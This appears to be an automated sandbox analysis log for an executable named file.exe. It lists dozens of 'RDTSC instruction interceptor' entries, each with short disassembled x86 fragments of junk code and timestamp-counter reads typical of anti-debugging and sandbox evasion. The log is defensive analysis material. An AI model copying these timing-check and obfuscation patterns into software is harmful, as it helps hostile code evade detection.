      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6E52 second address: 5F6E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jc 00007FC7C474F657h 0x00000011 pushad 0x00000012 jmp 00007FC7C474F649h 0x00000017 jnc 00007FC7C474F636h 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 pushad 0x00000024 popad 0x00000025 pop edi 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6E8C second address: 5F6F2E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d jmp 00007FC7C5219A68h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jne 00007FC7C5219A56h 0x0000001b popad 0x0000001c popad 0x0000001d pop eax 0x0000001e call 00007FC7C5219A64h 0x00000023 or edx, 2903FDD2h 0x00000029 pop edx 0x0000002a je 00007FC7C5219A58h 0x00000030 mov edi, esi 0x00000032 push 00000003h 0x00000034 and ecx, dword ptr [ebp+122D2B42h] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007FC7C5219A58h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 0000001Ah 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 add esi, dword ptr [ebp+122D2B6Eh] 0x0000005c push 00000003h 0x0000005e mov dword ptr [ebp+122D39EBh], esi 0x00000064 push F9BF8BE1h 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007FC7C5219A5Dh 0x00000070 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F6F2E second address: 5F6F80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F647h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 39BF8BE1h 0x00000010 movzx esi, bx 0x00000013 lea ebx, dword ptr [ebp+12456919h] 0x00000019 sub edx, dword ptr [ebp+122D3A78h] 0x0000001f jmp 00007FC7C474F647h 0x00000024 push eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 jno 00007FC7C474F636h 0x0000002e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618E9F second address: 618EB7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC7C5219A5Ch 0x00000008 jnl 00007FC7C5219A56h 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FC7C5219A56h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618EB7 second address: 618EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618EBB second address: 618EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616D92 second address: 616D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617061 second address: 61708D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A5Fh 0x00000007 jmp 00007FC7C5219A69h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61708D second address: 617093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617093 second address: 617097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617601 second address: 61760B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC7C474F636h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617773 second address: 617794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C5219A5Bh 0x00000009 push edi 0x0000000a jns 00007FC7C5219A56h 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 jne 00007FC7C5219A56h 0x0000001b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617794 second address: 617798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617B8D second address: 617BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C5219A69h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617BAA second address: 617BBD instructions: 0x00000000 rdtsc 0x00000002 je 00007FC7C474F63Eh 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617D0E second address: 617D20 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC7C5219A5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617D20 second address: 617D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C474F646h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617D3A second address: 617D69 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC7C5219A56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 jmp 00007FC7C5219A65h 0x00000015 jo 00007FC7C5219A56h 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617D69 second address: 617D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FC7C474F636h 0x0000000d jc 00007FC7C474F636h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617D7C second address: 617D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60AD00 second address: 60AD07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ECBF5 second address: 5ECBF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6185F8 second address: 61860B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC7C474F636h 0x0000000a popad 0x0000000b je 00007FC7C474F63Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618752 second address: 61875D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FC7C5219A56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6188BA second address: 6188CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007FC7C474F63Ch 0x0000000b jc 00007FC7C474F636h 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618A29 second address: 618A40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FC7C5219A5Ah 0x0000000a jo 00007FC7C5219A56h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618A40 second address: 618A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jl 00007FC7C474F636h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 ja 00007FC7C474F647h 0x0000001c jmp 00007FC7C474F63Bh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618A69 second address: 618A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FC7C5219A5Ch 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618A7B second address: 618A7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618A7F second address: 618A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ECC0A second address: 5ECC2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F63Dh 0x00000007 jmp 00007FC7C474F641h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618D16 second address: 618D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FC7C5219A56h 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618D23 second address: 618D29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B56D second address: 61B572 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B572 second address: 61B5AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC7C474F636h 0x0000000a jmp 00007FC7C474F640h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007FC7C474F649h 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B5AF second address: 61B5BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC7C5219A56h 0x0000000a popad 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E122E second address: 5E1250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FC7C474F63Bh 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d jmp 00007FC7C474F63Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1250 second address: 5E125B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E125B second address: 5E125F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D95D second address: 61D961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D961 second address: 61D967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623758 second address: 62375C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62375C second address: 623766 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC7C474F636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623766 second address: 623771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FC7C5219A56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622D08 second address: 622D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C474F645h 0x00000009 pushad 0x0000000a jmp 00007FC7C474F649h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6232E6 second address: 6232EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6232EA second address: 62330C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC7C474F644h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623479 second address: 623495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C5219A66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623495 second address: 62349B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62349B second address: 6234A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6234A6 second address: 6234AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6235EB second address: 6235EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62642D second address: 626464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC7C474F636h 0x0000000a popad 0x0000000b push eax 0x0000000c jbe 00007FC7C474F64Fh 0x00000012 jmp 00007FC7C474F649h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 push edi 0x00000021 pop edi 0x00000022 popad 0x00000023 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626464 second address: 626492 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FC7C5219A63h 0x00000011 jno 00007FC7C5219A56h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jg 00007FC7C5219A56h 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626492 second address: 6264AF instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC7C474F636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007FC7C474F63Ch 0x00000017 jnc 00007FC7C474F636h 0x0000001d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6265CF second address: 6265D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62701E second address: 62703A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FC7C474F638h 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 jnc 00007FC7C474F638h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62703A second address: 62703E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6272DD second address: 6272E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC7C474F636h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6272E7 second address: 6272EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6272EB second address: 6272F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62739B second address: 6273AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FC7C5219A56h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6273AF second address: 6273B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6274D3 second address: 6274D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6274D7 second address: 6274FA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC7C474F649h 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6274FA second address: 62750E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C5219A60h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62750E second address: 627557 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FC7C474F638h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D3989h], esi 0x00000029 xchg eax, ebx 0x0000002a jno 00007FC7C474F644h 0x00000030 push eax 0x00000031 pushad 0x00000032 push esi 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627557 second address: 627574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC7C5219A66h 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627574 second address: 627578 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6282BC second address: 628351 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC7C5219A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FC7C5219A5Dh 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 pushad 0x00000016 mov dword ptr [ebp+122D18CFh], ecx 0x0000001c or si, 8E9Eh 0x00000021 popad 0x00000022 xor dword ptr [ebp+124644F9h], ecx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007FC7C5219A58h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 00000017h 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 xor edi, dword ptr [ebp+122D1908h] 0x0000004a pushad 0x0000004b mov ecx, 3430DAF3h 0x00000050 call 00007FC7C5219A5Eh 0x00000055 jmp 00007FC7C5219A63h 0x0000005a pop esi 0x0000005b popad 0x0000005c push 00000000h 0x0000005e clc 0x0000005f xchg eax, ebx 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007FC7C5219A5Fh 0x00000067 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628351 second address: 628357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628357 second address: 62835B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62835B second address: 628384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F63Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FC7C474F642h 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DF645 second address: 5DF649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DF649 second address: 5DF65D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC7C474F636h 0x00000008 jnl 00007FC7C474F636h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62BF66 second address: 62BF6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62DBF6 second address: 62DC00 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC7C474F63Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F1B9 second address: 62F1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F1BE second address: 62F1C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FC7C474F636h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2D41 second address: 5E2D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2D4A second address: 5E2D59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jl 00007FC7C474F636h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F7CC second address: 62F852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7C5219A5Fh 0x00000008 jmp 00007FC7C5219A60h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 jnl 00007FC7C5219A56h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007FC7C5219A58h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 sub dword ptr [ebp+122D1AEBh], esi 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007FC7C5219A58h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 00000014h 0x00000052 inc edi 0x00000053 push edi 0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b jng 00007FC7C5219A56h 0x00000061 push eax 0x00000062 pop eax 0x00000063 popad 0x00000064 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C84E second address: 62C858 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC7C474F63Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C858 second address: 62C869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FC7C5219A58h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C869 second address: 62C873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FC7C474F636h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C873 second address: 62C877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
